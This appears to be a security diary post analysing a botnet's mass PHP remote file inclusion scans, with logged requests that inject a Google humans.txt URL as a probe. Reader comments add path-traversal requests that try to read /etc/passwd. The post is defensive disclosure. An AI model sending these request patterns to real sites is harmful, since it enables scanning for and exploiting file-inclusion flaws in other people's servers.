Massive PHP RFI scans
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
Some observed requests are shown below:
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.
Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!
UPDATE:
We received a lot of submissions regarding this – thanks to everyone that sent their logs/observations in! After analyzing logs we received it appears that these scans started around 21st of December 2013 and they are still going on.
Also, the capture Yinette did appear to have captured only a part of the attack. We received several submissions showing exact requests (that fortunately resulted in 404 errors :) for most of them).
The total number of requests done is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed is a RFI vulnerability and they always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).
So, this is getting pretty large, unfortunately we haven’t seen the bot’s code so far – if you do manage to catch it please upload it through our contact form so we can analyze it.
My next class:
Web App Penetration Testing and Ethical Hacking | Munich | Oct 14th - Oct 19th 2024 |
×
Diary Archives
Comments
"GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0"
"GET /irsr/authenticate/sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0"
etc., etc.
Anonymous
Jan 10th 2014
1 decade ago
Anonymous
Jan 10th 2014
1 decade ago
Anonymous
Jan 10th 2014
1 decade ago
Anonymous
Jan 10th 2014
1 decade ago
Anonymous
Jan 10th 2014
1 decade ago
Anonymous
Jan 12th 2014
1 decade ago
Anonymous
Jan 12th 2014
1 decade ago
Anonymous
Jan 12th 2014
1 decade ago